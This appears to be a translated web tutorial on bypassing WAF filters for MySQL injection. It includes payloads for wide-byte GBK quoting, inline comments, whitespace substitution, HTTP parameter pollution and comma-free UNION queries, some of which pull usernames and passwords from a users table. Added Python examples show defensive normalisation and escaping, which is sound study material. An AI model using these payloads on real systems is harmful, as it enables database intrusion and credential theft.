
What is the basic way for MySQL injection to bypass WAF?

2025-01-19 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This article mainly introduces "what is the basic way of MySQL injection to bypass WAF". In daily operation, I believe that many people have doubts about the basic way of MySQL injection to bypass WAF. The editor consulted all kinds of data and sorted out simple and easy-to-use methods of operation. I hope it will be helpful to answer the question of "what is the basic way of MySQL injection to bypass WAF?" Next, please follow the editor to study!

SQL injection bypassing WAF

Basic bypasses

1. Case bypass

Used when the filter's keyword matching is case-sensitive:

SeLECt * from table

2. Double write bypass

Used when forbidden keywords are deleted outright:

For example, preg_replace() or str_replace() is used to replace keywords such as and, or, select, union and so on with empty strings.

In this case you can bypass the filter by nesting a double write: or is written as oorr, and as aandnd, select as seselectlect, and union as uniunionon. After the filter deletes one copy of the keyword, the remaining characters reassemble into the complete keyword.

3. Inline comment

The purpose of inline comments is to increase the portability of SQL statements. For example, MySQL-specific syntax is written in the form of inline comments, in which case MySQL can normally parse and execute the code in inline comments, but other SQL servers ignore the contents of inline comments.

/*! MySQL-specific syntax */

For example, a MySQL server can recognize the STRAIGHT_JOIN keyword in the following statement, while other servers cannot:

SELECT /*! STRAIGHT_JOIN */ col1 FROM table1,table2 WHERE ...

If a version number follows the !, the syntax in the comment is executed only if the MySQL version is greater than or equal to the specified version number. For example, the keyword KEY_BLOCK_SIZE in the following comment is executed only by servers with MySQL version 5.1.10 or later:

CREATE TABLE t1 (a INT, KEY (a)) /*!50110 KEY_BLOCK_SIZE=1024 */

In comments of the /*! */ type, the statement inside is executed:

select bbb from table1 where aaa='' union /*! select database() */

This can be used to bypass some WAFs, or to bypass a filter on spaces.

However, a keyword cannot itself be split by a comment; for example, the following statement is not executable (or executes only in some older versions):

select bbb from table1 where balabala='' union se/*!lect*/ database()

4. Use hexadecimal to bypass specific characters

If the table name is filtered when querying the field name, or if certain characters in the database are filtered, you can use hexadecimal bypass.

Select column_name from information_schema.columns where table_name=0x7573657273

0x7573657273 is the hexadecimal encoding of the string users.

5. Wide byte injection and the Latin1 default encoding

Wide byte injection

Here are some common URL encodings:

Character  URL encoding
\          %5C
'          %27
"          %22
#          %23
&          %26

Utilization conditions of wide byte injection

Query parameters are surrounded by single quotation marks, and incoming single quotation marks are escaped with the escape character \, for example by applying addslashes(), mysql_real_escape_string() or another escape function to the received parameters in the backend.

The database is encoded as GBK

In a nutshell, single quotes are escaped but encoded as GBK.

Utilization mode

GET form

id=-1%df' union select 1,user(),3%23

Under the above conditions, the single quote ' is escaped as \', that is, %5c%27. If we put %df before the single quotation mark, we form %df%5c%27; in GBK encoding, %df%5c is read as one two-byte Chinese character, so the single quote successfully escapes the filter.

If the parameter is in the request body, you need to use the POST parameter. Capture the request with Burp Suite, then add %df before the single quotation mark (%27):

uname=%df%27 and 1=2 UNION SELECT 1,(SELECT GROUP_CONCAT(username,password SEPARATOR 0x3c62723e) FROM users)#&passwd=2

Principle of wide byte injection

When MySQL uses GBK encoding, it treats two bytes as one Chinese character; for example, %aa%5c is one Chinese character. Since the main escape method is to add a backslash \ in front of sensitive characters, the goal is to find a way to remove that backslash.

%df eats the \

In fact, the first byte is not limited to %df: anything in the range %aa to %fe works. The specific reason is that urlencode(\') = %5c%27; we add %df before %5c%27 to form %df%5c%27. When MySQL decodes this as GBK, two bytes are treated as one Chinese character, so %df%5c becomes a Chinese character and %27 is left outside as a separate symbol. At that point the goal has been achieved.

Removing the \ from \'

For example, if you can construct %5c%5c%27, the second %5c is escaped (consumed) by the first %5c. This is also a bypass method.

The addslashes() function returns a string with a backslash added before each predefined character.

After escaping, the predefined characters become: ' -> \', " -> \", \ -> \\

This function can be used to prepare strings for storage in the database as well as for database query statements.

When using addslashes(), the connection character set needs to be set to binary (issued through mysql_query) in order to defend against this vulnerability.
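The byte pairing described above, reproduced as an added example that is not part of the original article: a byte-wise addslashes() followed by a GBK read leaves a bare quote, while escaping after decoding with the connection character set does not. Function names are this example's own, and the connection character set is assumed to be GBK.

```python
# Added example (not from the original article): why addslashes() + GBK fails
# and what charset-aware escaping changes. Function names are this example's own.

def addslashes(raw: bytes) -> bytes:
    """Byte-wise escaping like PHP's addslashes(): prefix ' " \\ and NUL with \\."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)  # backslash
        out.append(b)
    return bytes(out)

def gbk_view(raw: bytes) -> str:
    """How a GBK-configured MySQL connection reads the bytes. Invalid
    sequences are shown as U+FFFD so the byte pairing stays visible."""
    return raw.decode("gbk", errors="replace")

def quote_survives(raw: bytes) -> bool:
    """True if a bare single quote reaches the SQL parser after addslashes()."""
    text = gbk_view(addslashes(raw))
    # A quote is bare unless the character right before it is a backslash.
    # For b"\xdf'" the backslash is swallowed into the two-byte character.
    return any(ch == "'" and (i == 0 or text[i - 1] != "\\")
               for i, ch in enumerate(text))

def escape_charset_aware(raw: bytes, charset: str = "gbk") -> bytes:
    """Decode with the connection charset first, escape per character,
    then re-encode. A stray lead byte such as %df before a quote is not a
    valid GBK sequence, so it is rejected instead of silently re-paired.
    This is the behaviour of mysql_real_escape_string() once the connection
    charset is configured correctly."""
    text = raw.decode(charset)  # raises UnicodeDecodeError on b"\xdf'"
    escaped = "".join("\\" + ch if ch in "'\"\\\x00" else ch for ch in text)
    return escaped.encode(charset)
```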

Latin1 coding

The encoding of a MySQL table defaults to latin1. If the character set is set to utf8, some characters exist in latin1 that are not in utf8. How does MySQL deal with these characters? It simply ignores them.

So we can submit username=admin%c2; once stored in the table it becomes admin.

The %c2 above can be replaced by any byte between %c2 and %ef.

6. Substitution of commonly used characters

and -> &&
or -> ||
space -> /**/ -> %a0 -> %0a -> +
# -> --+ -> ; (php)
Character matching: = -> like -> regexp -> in

Note: regexp is regular-expression matching, so there are some newer injection methods that make use of regular expressions.

Note that because & is the delimiter between the different parameters in URL, the & needs to be URL encoded as% 26 in the front end.

Filter whitespace

The preg_replace() or str_replace() function is used to replace whitespace characters with an empty string.

When spaces are filtered, use encoding to bypass the filter. The following symbols can be used instead:

Code  Description
%09   TAB (horizontal)
%0a   new line
%0d   carriage return
%0b   TAB (vertical)
%a0   non-breaking space

Filter comment

The preg_replace() or str_replace() function is used to replace multi-line comments /* */ and single-line comments -- and # with empty strings.

Bypass method: close the string or statement yourself (for example by balancing the quotation marks) instead of relying on a trailing comment.
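The filters described in sections 1 to 3 and 6 all remove or match raw input, which is what the case, double-write, inline-comment and whitespace tricks exploit. As an added example that is not part of the original article, the following code contrasts a single-pass removal filter with normalisation before matching; the names naive_filter, normalize_sql, strip_to_fixpoint and looks_like_injection are this example's own.

```python
import re

# Added example (not from the original article). Keyword list and whitespace
# substitutes are taken from the techniques discussed in the text.
KEYWORDS = ("union", "select", "and", "or")

# Whitespace substitutes: empty block comment, tab, newline, CR, vertical
# tab and non-breaking space (the %09 %0a %0d %0b %a0 of the table above).
_WS_SUBSTITUTES = re.compile(r"(?:/\*.*?\*/|[\t\n\r\x0b\xa0])", re.DOTALL)
# MySQL executes the body of /*! ... */ and /*!50110 ... */ comments.
_INLINE_COMMENT = re.compile(r"/\*!\d{0,5}\s*(.*?)\*/", re.DOTALL)

def naive_filter(s: str) -> str:
    """Single-pass removal of forbidden words, as the str_replace() filter in
    the text does. Case is not handled and 'seselectlect' survives as 'select'."""
    for kw in KEYWORDS:
        s = s.replace(kw, "")
    return s

def strip_to_fixpoint(s: str) -> str:
    """Repeat the removal until nothing changes, so a double-written keyword
    cannot reassemble into a complete one."""
    while True:
        t = naive_filter(s)
        if t == s:
            return s
        s = t

def normalize_sql(s: str) -> str:
    """Canonicalise input the way MySQL will read it, before matching:
    lower-case, unwrap inline comments, reduce whitespace substitutes."""
    s = s.lower()
    s = _INLINE_COMMENT.sub(r" \1 ", s)
    s = _WS_SUBSTITUTES.sub(" ", s)
    return re.sub(r"\s+", " ", s).strip()

def looks_like_injection(s: str) -> bool:
    """Detect (rather than delete): a UNION ... SELECT after normalisation."""
    return re.search(r"\bunion\b.*?\bselect\b", normalize_sql(s)) is not None
```

Detection on the normalised form is the robust choice; if removal is kept, it must at least run to a fixed point.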

7. HTTP parameter pollution

HTTP parameter pollution

Since no HTTP RFC defines the semantics of handling repeated parameters, each Web application may handle multiple parameters of the same name in a different way.

In a single HTTP request, an attacker uses multiple parameters with the same name to split the keywords in the injection statement into the value of each parameter.

For example, index.php?par1=val1&par1=val2

The following table shows how different Web servers manage the same parameter that occurs multiple times.

HTTP backend: overall parsing result (example)
ASP.NET/IIS: all occurrences concatenated (par1=val1,val2)
ASP/IIS: all occurrences concatenated (par1=val1,val2)
PHP/Apache: last occurrence (par1=val2)
PHP/Zeus: last occurrence (par1=val2)
JSP, Servlet/Apache Tomcat: first occurrence (par1=val1)

When the Web application concatenates the values of multiple parameters, the attacker obtains a complete injection statement. If the WAF only checks the value of each parameter individually, rather than processing the entire request as a single string, it will not be able to detect an HPP attack. ASP/IIS, for example, concatenates the values of repeated parameters.

Here are two SQL injection scenarios: a "regular attack" and an "attack using HPP".

The "regular attack" shows a standard UNION injection statement in the prodID parameter. This type of attack is easily identified by a Web Application Firewall (WAF). The second attack uses HPP on the prodID parameter: prodID occurs multiple times and the injection statement is split across the value of each occurrence. For the WAF to recognise the complete injection statement, all of the inputs need to be concatenated before checking.

Regular attack: http://webApplication/showproducts.asp?prodID=9 UNION SELECT 1,2,3 FROM Users WHERE id=3--

Attack using HPP: http://webApplication/showproducts.asp?prodID=9 /*&prodID=*/UNION /*&prodID=*/SELECT 1&prodID=2&prodID=3 FROM /*&prodID=*/Users /*&prodID=*/ WHERE id=3--
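A WAF-side check for the HPP case above, as an added example that is not part of the original article: repeated parameters are reassembled the way each backend in the table does before the value is inspected. The function names are this example's own; the URL is the article's HPP example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Added example (not from the original article). Backend behaviours follow
# the table in the text; function names are this example's own.
_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
_UNION_SELECT = re.compile(r"\bunion\b.*?\bselect\b", re.IGNORECASE | re.DOTALL)

def repeated_params(url: str) -> dict:
    """Map each query parameter name to the list of all its values, in order."""
    out = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        out.setdefault(name, []).append(value)
    return out

def backend_view(values: list, backend: str) -> str:
    """The value the application will actually see for a repeated parameter."""
    if backend in ("asp", "aspnet"):   # ASP/IIS, ASP.NET/IIS: comma-joined
        return ",".join(values)
    if backend in ("php", "zeus"):     # PHP/Apache, PHP/Zeus: last occurrence
        return values[-1]
    if backend == "tomcat":            # JSP/Servlet on Tomcat: first occurrence
        return values[0]
    raise ValueError(f"unknown backend {backend!r}")

def flagged_per_value(values: list) -> bool:
    """The weak check: each occurrence inspected on its own."""
    return any(_UNION_SELECT.search(_COMMENT.sub(" ", v)) for v in values)

def flagged_as_backend(values: list, backend: str) -> bool:
    """The sound check: inspect what the backend will reassemble."""
    seen = _COMMENT.sub(" ", backend_view(values, backend))
    return _UNION_SELECT.search(seen) is not None

# The article's HPP example URL (query string kept exactly as shown).
HPP_URL = ("http://webApplication/showproducts.asp?prodID=9 /*&prodID=*/UNION /*"
           "&prodID=*/SELECT 1&prodID=2&prodID=3 FROM /*&prodID=*/Users /*"
           "&prodID=*/ WHERE id=3--")
```

The per-value check never sees UNION and SELECT together, while the comma-joined ASP/IIS view does; a PHP backend sees only the last fragment, so the same request is harmless there.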

8. Commas are filtered.

Replace with join

-1 union select 1,2,3

-1 union select * from (select 1)a join (select 2)b join (select 3)c%23

Limit

Limit 2,1

Limit 1 offset 2

Substr

select substr(database(),5,1)

select substr(database() from 5 for 1): from gives the starting position and for gives the length to extract.

select substr(database() from 5): from 5 means extract from the fifth character onwards.

If for is filtered as well:

select mid(reverse(mid(database() from(-5))) from(-1))

If

select if(database()='xxx',sleep(3),1)

select 1 and database()='security' and sleep(3)

select case when database()='xxx' then sleep(5) else 0 end

9. Limit is filtered

select user from users limit 1

Add a restriction instead:

select user from users group by user_id having user_id=1 (user_id is a column in the table)

10. and, or, &&, || filtered

Can be replaced by the operators ! ^ ~ and by not and xor.

11. Substitution of characters and functions

Substitution of common functions

String interception / concatenation function:

Extracted from https://xz.aliyun.com/t/7169

Function: description
SUBSTR(str,N_start,N_length): extracts part of the specified string; a simpler form of SUBSTRING.
SUBSTRING(): several forms: SUBSTRING(str,pos), SUBSTRING(str FROM pos), SUBSTRING(str,pos,len), SUBSTRING(str FROM pos FOR len).
RIGHT(str,len): extracts len characters from the right end of the string.
LEFT(str,len): extracts len characters from the left end of the string.
RPAD(str,len,padstr): pads str on the right with padstr up to len characters and returns the new string; if str is longer than len, the return value is shortened to len characters.
LPAD(str,len,padstr): like RPAD, but pads on the left of str.
MID(str,pos,len): identical to SUBSTRING(str,pos,len).
INSERT(str,pos,len,newstr): in the original string str, replaces the len characters starting at position pos with the new string newstr and returns the result. INSERT(str,len,1,0x0) can be used as an extraction function.
CONCAT(str1,str2,...): merges multiple strings into a single string.
GROUP_CONCAT(...): returns a string made up of the concatenated values in the group.
MAKE_SET(bits,str1,str2,...): returns the other arguments selected according to the first argument. Can be used for Boolean blind injection, for example EXP((LENGTH(DATABASE())>8)+1).

Substitution of numbers:

Numbers can be replaced by combinations of true, false, pi(), !, floor(), ~, ceil(), version() and other mathematical operators and functions.

Function / statement: description
LENGTH(str): returns the length of the string.
PI(): returns the value of π.
REGEXP "pattern": matches the data against a regular expression and returns a Boolean value.
LIKE "pattern": matches the data; % stands for arbitrary content. The return value is a Boolean.
RLIKE "pattern": the same as REGEXP.
LOCATE(substr,str,[pos]): returns the position at which the substring first appears.
POSITION(substr IN str): equivalent to LOCATE().
LOWER(str): converts all uppercase letters in the string to lowercase. Same as LCASE(str).
UPPER(str): converts all lowercase letters in the string to uppercase. Same as UCASE(str).
ELT(N,str1,str2,str3,...): like MAKE_SET(bits,str1,str2,...); returns an argument selected according to N.
NULLIF(expr1,expr2): returns expr1 if expr1 is the same as expr2, NULL otherwise.
CHARSET(str): returns the character set used by the string.
DECODE(crypt_str,pass_str): decrypts the encrypted string crypt_str using pass_str as the password. The encryption function is ENCODE(str,pass_str).

At this point, the study of "what is the basic way for MySQL injection to bypass WAF" is over. I hope it has resolved your doubts. Combining theory and practice helps you learn better, so go and try it! If you want to continue learning more related knowledge, please keep following the website; the editor will keep working hard to bring you more practical articles!
